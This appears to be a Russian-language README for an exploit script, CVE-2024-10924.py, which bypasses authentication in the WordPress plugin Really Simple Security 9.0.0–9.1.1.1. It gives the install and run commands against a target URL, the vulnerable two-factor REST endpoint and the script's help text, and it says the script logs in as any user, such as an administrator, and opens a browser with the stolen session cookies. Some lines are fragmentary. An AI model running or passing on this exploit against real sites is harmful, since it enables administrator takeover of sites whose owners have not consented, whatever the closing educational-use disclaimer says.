
Really Simple Security (Free, Pro, and Pro Multisite) 9.0.0 - 9.1.1.1 - Обход аутентификации
Really Simple Security (Free, Pro, и Pro Multisite) 9.0.0 – 9.1.1.1 — Обход аутентификации
Этот скрипт эксплуатирует уязвимость в плагине Really Simple Security (версии 9.0.0 – 9.1.1.1) для WordPress. Ошибка позволяет обходить аутентификацию из-за неправильной обработки ошибок в функции check_login_and_get_user в API двухфакторной аутентификации.
Используя этот эксплойт, злоумышленник может войти под любым пользователем (например, администратором), если включена 2FA. После аутентификации скрипт автоматически запускает сессию браузера с полученными куки-сессии.
Перед запуском скрипта установите необходимые зависимости:
pip install requests selenium webdriver-manager
python CVE-2024-10924.py -u http://ЦЕЛЕВОЙ-САЙТ/
/wp-json/reallysimplessl/v1/two_fa/skip_onboarding
/wp-admin/, предоставляя доступ администратора без необходимости ввода пароля.usage: CVE-2024-10924.py [-h] -u URL
WordPress Login Exploit | Really Simple Security (Free, Pro, and Pro Multisite) 9.0.0 - 9.1.1.1 - Authentication
Bypass
options:
-h, --help show this help message and exit
-u URL, --url URL Target WordPress URL
Данный скрипт предназначен только для образовательных целей и авторизованных проверок безопасности. Неправомерное использование может повлечь юридические последствия. Всегда получайте надлежащее разрешение перед тестированием любой системы.